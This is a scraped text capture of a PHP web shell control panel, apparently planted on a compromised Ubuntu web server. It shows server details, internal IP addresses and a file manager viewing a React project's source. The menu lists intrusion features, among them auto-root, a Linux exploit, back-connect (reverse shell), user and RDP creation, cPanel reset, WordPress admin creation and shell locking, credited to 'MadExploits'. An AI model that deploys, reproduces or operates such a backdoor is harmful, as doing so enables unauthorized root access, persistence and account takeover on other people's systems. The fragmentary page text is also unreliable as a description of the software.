Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
QuantumSeminar-main /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
components
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
profImage
[ DIR ]
drwxr-xr-x
App.css
564
B
-rw-r--r--
App.js
1022
B
-rw-r--r--
App.test.js
246
B
-rw-r--r--
index.css
366
B
-rw-r--r--
index.js
535
B
-rw-r--r--
reportWebVitals.js
362
B
-rw-r--r--
setupTests.js
241
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.js
import React from 'react'; import ReactDOM from 'react-dom/client'; import './index.css'; import App from './App'; import reportWebVitals from './reportWebVitals'; const root = ReactDOM.createRoot(document.getElementById('root')); root.render( <React.StrictMode> <App /> </React.StrictMode> ); // If you want to start measuring performance in your app, pass a function // to log results (for example: reportWebVitals(console.log)) // or send to an analytics endpoint. Learn more: https://bit.ly/CRA-vitals reportWebVitals();
Close